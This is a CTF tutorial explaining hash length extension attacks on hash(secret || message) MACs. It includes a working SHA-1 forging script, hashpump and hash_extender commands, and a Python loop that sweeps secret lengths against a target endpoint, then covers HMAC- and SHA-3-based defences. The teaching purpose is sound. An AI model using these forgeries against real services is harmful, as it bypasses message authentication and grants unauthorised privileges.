Hash Length Extension Attacks for CTF: Forging a MAC Without the Secret

Can you forge a MAC without knowing the secret?

If a service authenticates messages by computing signature = hash(secret || message) with a plain Merkle-Damgard hash (MD5, SHA-1, SHA-256), then yes. You can take a message and its valid signature, append your own bytes to the message, and compute a valid signature for the new, longer message without ever knowing the secret. This is the hash length extension attack, and it is one of the highest-reward bugs in CTF crypto and web categories because it looks like a real authentication scheme and is not one.

The digest of a Merkle-Damgard hash is not a fingerprint. It is a saved checkpoint of the machine. Hand someone the checkpoint and they can keep running the machine from where you stopped.

Everything you need to pull it off:

The original message (the known, signed data).
The original signature (the hex digest the server handed you).
The bytes you want to append (for example &admin=true).
The length of the secret in bytes. You do not know it, but you can brute force it in seconds.

Feed those to hashpump or hash_extender and the tool prints a new message and a new signature that the server will accept. The rest of this post explains why this works, how to run it, how to handle the unknown secret length, and why HMAC and SHA-3 make the whole attack disappear. If you want to first confirm which hash you are looking at, the on-site hash identifier tells you whether a digest is MD5, SHA-1, or SHA-256 from its length alone.

Note: This attack is about forging a signature, not recovering the secret or reversing the hash. If your goal is to recover a password behind a hash, that is a different job covered in the Hash Cracking guide. Length extension never learns the secret; it just keeps hashing past it.

Why does a plain hash leak its own internal state?

MD5, SHA-1, and SHA-256 are all built on the Merkle-Damgard construction. The hash holds a fixed-size internal state (for SHA-256 that is eight 32-bit words, 256 bits total). It chops the input into fixed-size blocks (64 bytes for all three of these), and for each block it runs a compression function that mixes the block into the state. When the input runs out, it appends padding, processes the final block, and outputs the state as the digest.

The structure looks like this:

state = IV                       # fixed initialization vector
for block in blocks(message + padding):
    state = compress(state, block)
digest = state                   # <-- the output IS the final state

Read that last line again. The digest is a verbatim copy of the internal state after the last block. There is no final scrambling step that hides it, no key folded in at the end. So when the server hands you a hex digest, it has handed you the exact register contents the compression function would be sitting on if it were about to process one more block.

Key insight: To resume hashing you need two things: the state to resume from, and the byte count already consumed (so the padding lands in the right place). The digest gives you the state for free. The byte count is just len(secret) + len(message) + len(original_padding), and the only unknown in it is the secret length. That single unknown is the entire difficulty of the attack, and it is small enough to brute force.

The padding is the other half of the trick, so it is worth seeing exactly. Merkle-Damgard padding (the "MD strengthening" scheme) appends a single 0x80 byte, then enough 0x00 bytes to leave room, then the total bit length of the input as a 64-bit integer (big-endian for SHA-1 and SHA-256, little-endian for MD5), so the whole thing is a multiple of 64 bytes:

import struct
# message = b'COMMAND=getbalance'  (18 bytes)  with a 14-byte secret
# the hash actually processed: secret(14) || message(18) = 32 bytes of data
padding = b'\x80' + b'\x00' * 23 + struct.pack('>Q', 256)  # 32 bytes of data = 256 bits
#         0x80 byte   zero fill        64-bit big-endian bit length (SHA-1 / SHA-256)
# 32 data bytes + 32 padding bytes = 64 = exactly one block

That padding (the 0x80, the zeros, and the length field) is called the glue padding. It is part of what got hashed to produce the signature you hold, so it becomes part of the message you forge. The server computed the digest over secret || message || glue_padding as a complete block, and your forged message will contain that glue verbatim.
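The padding rule generalizes to any input length. The sketch below is a minimal helper, not taken from any particular library; the name md_padding and its big_endian switch are assumptions made for illustration.

```python
import struct

BLOCK_SIZE = 64  # bytes per block for MD5, SHA-1 and SHA-256

def md_padding(data_len: int, big_endian: bool = True) -> bytes:
    """Return the glue padding a Merkle-Damgard hash adds after data_len bytes."""
    # one 0x80 byte, then zeros until the input is 8 bytes short of a block boundary
    zeros = (BLOCK_SIZE - 9 - data_len) % BLOCK_SIZE
    # 64-bit bit length: big-endian for SHA-1/SHA-256, little-endian for MD5
    fmt = '>Q' if big_endian else '<Q'
    return b'\x80' + b'\x00' * zeros + struct.pack(fmt, data_len * 8)

# the example above: 14-byte secret plus 18-byte message
glue = md_padding(14 + 18)
print(len(glue), glue.hex())
```

The padded total, data_len + len(md_padding(data_len)), is the byte count the hash has consumed when it emits the digest, which is the value a resumed hash needs as its starting length.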

What exactly is the vulnerable pattern?

The bug is the construction MAC = hash(secret || message), where || is concatenation. A developer wants to stop clients from tampering with a query string, a cookie, or an API parameter, so they prepend a server-only secret and hash the whole thing. The client gets the message plus the hash. To verify, the server recomputes hash(secret || message) and compares.

It feels airtight. The client never sees the secret, and changing a single byte of the message produces a wildly different hash. The flaw is that the attacker does not need to keep the hash the same. They are allowed to extend the message, and the construction lets them compute the new hash for the extended message for free.

A canonical vulnerable endpoint looks like this:

GET /api?user=guest&role=user&mac=df3e... HTTP/1.1
# server side, in pseudo-python:
def verify(query, mac):
    expected = sha256(SECRET + query).hexdigest()   # secret || message
    return expected == mac                          # plain hash compared directly, not HMAC
# if it parses the LAST value of a repeated key, appending
#   &role=admin
# to the query overrides role=user, and length extension
# produces a mac the server will accept.

Warning: Two things make a target exploitable beyond just using a plain hash. First, the secret must be prepended, not appended. hash(message || secret) is not vulnerable to this attack. Second, your appended bytes have to actually change the server's decision after it parses the message. The glue padding (raw 0x80 and null bytes) ends up in the middle of your forged message, so the parser has to tolerate or ignore it. Query strings, cookies, and many ad-hoc serialization formats do tolerate it.
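To see why a query-string parser tolerates the glue, here is a small sketch using Python's standard urllib.parse. The forged query is shortened for readability, and the last-value-wins rule is an assumption about the target; real servers differ in how they treat repeated keys.

```python
from urllib.parse import parse_qs

# forged query as it would travel on the wire: original fields, percent-encoded
# glue padding (shortened here), then the appended field
forged_qs = 'user=guest&role=user%80%00%00&role=admin'

# latin-1 maps every byte to exactly one character, so the raw padding decodes cleanly
fields = parse_qs(forged_qs, encoding='latin-1')

# the glue ends up glued to the first role value; the appended value is separate
effective_role = fields['role'][-1]   # what a last-value-wins parser would use
print(fields['role'], effective_role)
```

The padding bytes pollute the first role value but leave the appended one clean, which is why a parser that keeps the last occurrence ends up seeing role=admin.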

How does length extension forge a valid MAC?

Here is the whole attack in one breath. The server computed signature = hash(secret || message). That signature is the hash's internal state right after it absorbed secret || message || glue_padding. You load that state back into a fresh hash object, tell it how many bytes it has "already" processed, and feed it your append bytes. The hash continues as if it had been computing secret || message || glue_padding || append all along, and it outputs a valid signature for exactly that string.

Step by step:

Take the known signature and split it back into the hash's state words (8 words for SHA-256, 5 for SHA-1, 4 for MD5).
Reconstruct the glue padding that the original secret || message block would have used. This needs the secret length, which you guess.
Build the forged message as message || glue_padding || append. This is the data the server will think it signed.
Resume the hash from the loaded state, with its length counter preset to len(secret) + len(message) + len(glue_padding) bytes, and absorb append. The output is the forged signature.
Send forged_message and forged_signature to the server. It computes hash(secret || forged_message) and gets the same value, because that is exactly the computation you just continued.

A minimal hand-rolled version against SHA-1 makes the mechanism concrete. The library here is pure-sha1-style code that exposes the state and prelength; the real tools below do all of this for you, but seeing it once removes the magic:

# SHA1_from_state, set_processed_length and sha1_padding stand in for the
# state-exposing library; they are illustrative names, not a published API
orig_msg  = b'user=guest&role=user'
orig_sig  = '6b9e...'             # hex digest from the server (SHA-1, 40 chars)
append    = b'&role=admin'
guess_len = 14                    # guessed secret length in bytes
# 1) rebuild the glue padding the server's hash applied to secret || message
glue = sha1_padding(guess_len + len(orig_msg))
# 2) load the digest back into the SHA-1 state and set the byte counter
#    to everything already absorbed, glue included
h = SHA1_from_state(bytes.fromhex(orig_sig))
h.set_processed_length(guess_len + len(orig_msg) + len(glue))
# 3) absorb only the new bytes; the forged message carries the glue verbatim
h.update(append)
forged_msg = orig_msg + glue + append
forged_sig = h.hexdigest()
print(forged_msg)                 # send this as the message
print(forged_sig)                 # send this as the mac

Notice what never appears in that script: the secret's value. Only its length matters, and only because the length determines where the glue padding falls. The secret could be a 14-character passphrase or 14 bytes of random key material; the forgery is identical either way.
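For readers who want something they can actually run, the following is a self-contained sketch of the same steps against SHA-1, checked locally against hashlib. The function names (sha1_compress, sha1_padding, sha1_extend) and the demo secret are assumptions made for this example; the script plays the server only so that the forgery can be verified.

```python
import hashlib
import struct

def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def sha1_compress(state, block):
    """One SHA-1 compression step: mix a 64-byte block into five state words."""
    w = list(struct.unpack('>16I', block))
    for i in range(16, 80):
        w.append(_rol(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    a, b, c, d, e = state
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        a, b, c, d, e = (_rol(a, 5) + f + e + k + w[i]) & 0xFFFFFFFF, a, _rol(b, 30), c, d
    return tuple((s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d, e)))

def sha1_padding(data_len):
    """Glue padding SHA-1 appends after data_len bytes of input."""
    zeros = (64 - 9 - data_len) % 64
    return b'\x80' + b'\x00' * zeros + struct.pack('>Q', data_len * 8)

def sha1_extend(orig_sig_hex, orig_msg, append, secret_len):
    """Return (forged_msg, forged_sig_hex) for a guessed secret length."""
    # step 1: the digest is the state, split into five 32-bit words
    state = struct.unpack('>5I', bytes.fromhex(orig_sig_hex))
    # step 2: rebuild the glue the server's hash used
    glue = sha1_padding(secret_len + len(orig_msg))
    processed = secret_len + len(orig_msg) + len(glue)   # always a multiple of 64
    # step 4: hash only the new bytes, padded as if the whole forged input was hashed
    tail = append + sha1_padding(processed + len(append))
    for i in range(0, len(tail), 64):
        state = sha1_compress(state, tail[i:i + 64])
    # step 3: the forged message carries the glue verbatim
    return orig_msg + glue + append, struct.pack('>5I', *state).hex()

# local demo: the secret is made up here and is never passed to sha1_extend
secret = b'0123456789abcd'                      # 14 bytes
orig_msg = b'user=guest&role=user'
orig_sig = hashlib.sha1(secret + orig_msg).hexdigest()
forged_msg, forged_sig = sha1_extend(orig_sig, orig_msg, b'&role=admin', len(secret))
print(forged_sig == hashlib.sha1(secret + forged_msg).hexdigest())
```

Only len(secret) crosses into sha1_extend. A wrong length guess often yields the same forged signature, because the padded length rounds to the same block boundary, but the glue inside the forged message differs, so the server's recomputed hash no longer matches.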

How do you run it with hashpump or hash_extender?

Nobody hand-rolls the state surgery in a CTF. Two tools own this attack: hash_extender (the reference implementation, supports MD4, MD5, RIPEMD-160, SHA-0, SHA-1, SHA-256, SHA-512, WHIRLPOOL) and hashpump (simpler interface, MD5 and the SHA family). Both take the same four inputs and print the forged message and forged signature.

hash_extender with explicit flags:

$ hash_extender \
    --data 'user=guest&role=user' \
    --secret 14 \
    --append '&role=admin' \
    --signature 6b9e1f...c0 \
    --format sha256 \
    --out-data-format html
Type: sha256
Secret length: 14
New signature: 2f5d9c7a...e41b
New string: user%3dguest%26role%3duser%80%00%00...%01%10%26role%3dadmin

The --out-data-format html flag URL-encodes the raw glue bytes so you can paste the result straight into a query string. Use hex if you need to post-process it; hash_extender --help lists the other output formats. The New string is your forged message and New signature is the MAC to send alongside it. The padding ends in %01%10 because 14 + 20 = 34 bytes is 272 bits, or 0x0110.

hashpump does the same job with a terser interface:

# -s: original signature, -a: data to append, -k: key (secret) length in bytes
$ hashpump \
    -s 6b9e1f...c0 \
    --data 'user=guest&role=user' \
    -a '&role=admin' \
    -k 14
2f5d9c7a...e41b
user=guest&role=user\x80\x00...&role=admin
# output line 1 is the forged signature, line 2 is the forged message

Tip: hashpump infers the hash algorithm from the length of the signature you pass to -s: 32 hex chars means MD5, 40 means SHA-1, 64 means SHA-256. If you are not sure what you are holding, run it through the hash identifier first so you pick the right --format for hash_extender.
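The length rule is simple enough to sketch in a few lines. This is an illustrative helper, not the hash identifier itself; the name guess_algorithm is an assumption, and length alone cannot separate hashes that share an output size (MD4 and MD5 are both 128 bits, for example).

```python
# hex digest length -> the Merkle-Damgard candidates discussed in this post
CANDIDATES = {32: 'md5', 40: 'sha1', 64: 'sha256'}

def guess_algorithm(hex_digest: str) -> str:
    """Guess the hash from the digest length; raises ValueError on non-hex input."""
    bytes.fromhex(hex_digest)                      # validates that the string is hex
    return CANDIDATES.get(len(hex_digest), 'unknown')

print(guess_algorithm('d41d8cd98f00b204e9800998ecf8427e'))   # a 32-character digest
```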

The output message contains literal high bytes (0x80 and nulls). When you put it on the wire, encode it the way the target expects: percent-encoding for URLs and cookies, raw bytes for a binary protocol. A mismatch here (sending the literal text \x80 instead of the byte) is the single most common reason a correct forgery gets rejected.
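As a concrete illustration of that encoding step, the sketch below converts hashpump-style escaped text into raw bytes and then percent-encodes it for a query string. The printed value is a shortened, made-up sample. The unicode_escape round trip assumes the original message contains no backslashes of its own.

```python
from urllib.parse import quote

# escaped text as a tool would print it on a terminal (shortened sample)
printed = r'user=guest&role=user\x80\x00\x00&role=admin'

# turn the four characters "\x80" into the single byte 0x80
raw = printed.encode('latin-1').decode('unicode_escape').encode('latin-1')

# percent-encode the raw bytes but keep the query-string delimiters literal
wire = quote(raw, safe='=&')
print(wire)
```

Leaving = and & out of the safe set would encode them too, and the server would then see one long key instead of separate parameters.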

What if you do not know the secret length?

You usually do not. The secret length is the one unknown the attack needs, and it is bounded: in CTF challenges the secret is almost always short, typically between 4 and 64 bytes. So you do not guess, you sweep. Generate a forgery for every candidate length, send each one, and keep the one the server accepts. Only the correct length produces the right glue padding, and the server itself tells you which one that is.

A length sweep with hashpump driven from Python:

import subprocess, urllib.parse, requests
ORIG_SIG  = '6b9e1f...c0'
ORIG_DATA = 'user=guest&role=user'
APPEND    = '&role=admin'
URL       = 'https://target.ctf/api'
for keylen in range(1, 65):                 # sweep candidate secret lengths
    out = subprocess.run(
        ['hashpump', '-s', ORIG_SIG, '--data', ORIG_DATA,
         '-a', APPEND, '-k', str(keylen)],
        capture_output=True, text=True).stdout.splitlines()
    forged_sig = out[0]
    forged_msg = out[1].encode().decode('unicode_escape').encode('latin-1')
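    forged_qs  = urllib.parse.quote(forged_msg, safe='=&')   # URL-encode the raw bytes, keep = and & literal
    r = requests.get(f'{URL}?{forged_qs}&mac={forged_sig}')
    # the success check is target-specific; a bare 200 only helps if rejections return something else
    if 'Welcome admin' in r.text or r.status_code == 200: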
        print(f'[+] secret length = {keylen}')
        print(r.text)
        break

The same loop works with hash_extender by swapping the subprocess call for hash_extender --secret {keylen} ... and parsing its New signature / New string lines. Sixty-four requests is nothing; the sweep finishes faster than reading this paragraph.

Note: If the service gives no clear success signal, look for a difference in length, status code, or timing between the rejected attempts and the accepted one. A correct forgery changes the server's parse of the message, so a 200/403 split or a different response body is the usual tell. When even that is hidden, the Cookies and JWTs guide covers the same oracle-hunting mindset for signed tokens, which is the web context where prepend-secret MACs show up most.

Why are HMAC and SHA-3 immune?

The attack works because the digest equals the final internal state and you can resume from it. Kill either of those properties and the attack dies. HMAC and SHA-3 each kill one.

HMAC (defined in RFC 2104) wraps the hash in two keyed passes:

HMAC(K, m) = H( (K xor opad) || H( (K xor ipad) || m ) )
#  inner hash:  H((K xor ipad) || m)   -> produces a digest
#  outer hash:  H((K xor opad) || inner_digest)  -> final MAC

Length extension gets you nowhere here. The inner digest is never shown to you, and even if you could predict an extended inner state, that value is then fed through a second hash keyed with K xor opad. You do not know K, so you cannot compute the outer hash, and the MAC the server checks is the outer one. Extending the outer hash does not help either: the result is the hash of the key block, the inner digest, glue padding, and your appended bytes, and no message produces an outer input of that shape. The resumable state you captured never maps to a valid MAC. That nested keyed structure is the entire reason HMAC exists, and it is why well-designed signing schemes use HMAC-SHA256 rather than SHA256(secret || message).
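The two-pass structure is short enough to write out by hand. The sketch below rebuilds HMAC-SHA256 from the formula and checks it against Python's hmac module; the function name hmac_sha256_manual and the demo key are assumptions for illustration, and in real code you would call hmac.new directly.

```python
import hashlib
import hmac

def hmac_sha256_manual(key: bytes, msg: bytes) -> bytes:
    """HMAC-SHA256 spelled out from the RFC 2104 formula."""
    block = 64                                   # SHA-256 block size in bytes
    if len(key) > block:
        key = hashlib.sha256(key).digest()       # long keys are hashed first
    key = key.ljust(block, b'\x00')              # then zero-padded to one block
    ipad = bytes(b ^ 0x36 for b in key)
    opad = bytes(b ^ 0x5C for b in key)
    inner = hashlib.sha256(ipad + msg).digest()  # never leaves the function
    return hashlib.sha256(opad + inner).digest() # the only value an attacker sees

key, msg = b'demo-key', b'user=guest&role=user'
print(hmac_sha256_manual(key, msg) == hmac.new(key, msg, hashlib.sha256).digest())
```

The inner digest stays local to the function, which is the point: the only state an attacker could resume from belongs to a hash whose input they cannot legitimately extend.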

SHA-3 (Keccak) is immune for a different reason: it is not Merkle-Damgard at all. It uses a sponge construction with a large internal state, only part of which (the rate) is exposed as output; the rest (the capacity) is never revealed. The digest is not the full internal state, so you cannot reload the machine from it. Resuming is impossible because the bytes you would need to resume were never output. BLAKE2 and BLAKE3 are likewise immune, as are the truncated SHA-2 variants SHA-512/224 and SHA-512/256, because truncation hides part of the final state.
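The size mismatch can be read straight off hashlib. In this sketch the 200-byte figure is the Keccak-f[1600] state size from the SHA-3 standard, while the rate is taken from hashlib's block_size attribute; the variable names are mine.

```python
import hashlib

KECCAK_STATE_BYTES = 200                 # Keccak-f[1600] permutation state

h3 = hashlib.sha3_256(b'secret' + b'message')
rate = h3.block_size                     # bytes absorbed per permutation call
capacity = KECCAK_STATE_BYTES - rate     # bytes that never appear in any output
print('sha3_256 digest:', h3.digest_size, 'rate:', rate, 'capacity:', capacity)

# contrast: for SHA-256 the digest is the same size as the whole chaining state
h2 = hashlib.sha256(b'secret' + b'message')
print('sha256 digest:', h2.digest_size, 'state: 32')
```

A SHA-256 digest accounts for every byte of the chaining state, while a SHA3-256 digest covers only a small fraction of the sponge, so there is nothing complete to reload.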

Length extension is not a weakness in SHA-256. It is a weakness in using SHA-256 as if it were a MAC. The fix is not a stronger hash; it is HMAC.

How do you defend against it (and spot it in review)?

The defense is one line. Never authenticate with a bare hash. Use HMAC with a dedicated key:

import hmac, hashlib
# vulnerable
mac = hashlib.sha256(secret + message).hexdigest()
# safe
mac = hmac.new(secret, message, hashlib.sha256).hexdigest()
# verify in constant time, always
ok = hmac.compare_digest(mac, provided_mac)

Other constructions that close the hole, in rough order of preference: use HMAC (the default answer); switch to a length-extension-resistant hash like SHA-3, BLAKE2/BLAKE3, or a truncated SHA-512 variant; or, if you are stuck with a Merkle-Damgard hash and no HMAC, hash twice with the secret in both passes, hash(secret || hash(secret || message)), which is essentially a hand-rolled HMAC. The clean choice is always HMAC, because the others are easy to get subtly wrong.

Tip: In code review, grep for the pattern directly. Any of sha256(secret + data), md5(key + msg), or sha1(SECRET . $payload) where the result is later treated as a signature is the smell. The tell is a hash function with a secret as the first argument and the result compared against client-supplied data. If you see it, you have found the bug.
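That grep can be approximated with one regular expression. The sketch below is a rough heuristic, not a complete scanner: the pattern, the function name looks_like_prefix_mac, and the assumption that secrets live in variables containing "secret" or "key" are all mine, so expect both misses and false positives.

```python
import re

# a hash call whose first argument is a secret-looking name followed by
# a concatenation operator (+ in Python/JS, . in PHP)
PATTERN = re.compile(
    r'\b(md5|sha1|sha256)\s*\(\s*\$?\w*(secret|key)\w*\s*[+.]',
    re.IGNORECASE,
)

def looks_like_prefix_mac(line: str) -> bool:
    """Flag lines that appear to compute hash(secret || data)."""
    return PATTERN.search(line) is not None

samples = [
    'mac = hashlib.sha256(secret + message).hexdigest()',
    '$sig = sha1(SECRET . $payload);',
    'mac = hmac.new(secret, message, hashlib.sha256).hexdigest()',
]
for line in samples:
    print(looks_like_prefix_mac(line), line)
```

A hit is only a lead: confirm that the result is compared against client-supplied data before calling it a finding.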

Quick reference

Is it exploitable?

The MAC is hash(secret || message) with MD5, SHA-1, or SHA-256 (check the digest length: 32, 40, or 64 hex chars).
The secret is prepended, not appended. Appended secret is not vulnerable.
You can see one valid (message, signature) pair.
Your appended bytes (plus the raw glue padding) survive the server's parser and change its decision.

Tool cheat sheet

# hash_extender (explicit, many algorithms)
hash_extender --data DATA --secret LEN --append APP \
    --signature SIG --format sha256 --out-data-format html
# hashpump (terse, infers algo from signature length)
hashpump -s SIG --data DATA -a APP -k LEN
# unknown secret length? sweep 1..64 and let the server pick
for k in $(seq 1 64); do hashpump -s SIG --data DATA -a APP -k $k; done

For the neighboring techniques: recovering the secret behind a hash is the Hash Cracking guide; attacking signed web tokens and cookies is the Cookies and JWTs guide; and the symmetric encryption that often sits next to these MACs is the AES for CTF guide.

The whole attack fits on a sticky note: if a server signs with hash(secret || message), the signature is a checkpoint, and a checkpoint is an invitation to keep going.